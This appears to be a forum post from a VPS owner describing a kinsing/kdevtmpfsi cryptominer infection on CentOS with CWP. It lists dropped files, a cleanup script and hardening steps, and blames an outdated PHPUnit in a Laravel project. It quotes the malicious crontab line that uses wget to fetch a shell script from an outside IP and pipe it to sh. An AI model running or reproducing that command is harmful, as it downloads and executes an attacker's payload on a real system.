I've recently been hacked on my VPS(using Centos 7.6 and CWP up to date) and the following files/folders were created:
/tmp/.ICEd-unix
/var/tmp/.ICEd-unix
/tmp/kdevtmpfsi
/var/tmp/kinsing
The following processes were running and using 100% CPU and Memory:
kdevtmpfpsi
kinsing
Also, the user's crontab had this following line:
* * * * * wget -q -O - http://195.3.146.118/p.sh | sh > /dev/null 2>&1
As of yet, I'm still getting the /tmp/.ICEd-unix
and /var/tmp/.ICEd-unix
folders created every hour and I can't figure out what it is.
- create a cron on root user that deletes and kills the processes:
#/bin/bash
rm -f /var/tmp/kinsing
rm -f /var/tmp/.ICEd-unix
killall -9 kinsing
rm -f /tmp/kdevtmpfsi
rm -f /tmp/.ICEd-unix
killall -9 kdevtmpfsi
- remove the crontab line from the affected user
- remove all unnecessary opened ports in firewall
- disable shell access to the user(from CWP)
- update all services/projects to the latest possible versions available in your package manager
- Found these lines in
suexec.log
: https://imgur.com/yIliqjJ, therefore an exploit from phpunit. My libraries for the laravel project weren't up to date.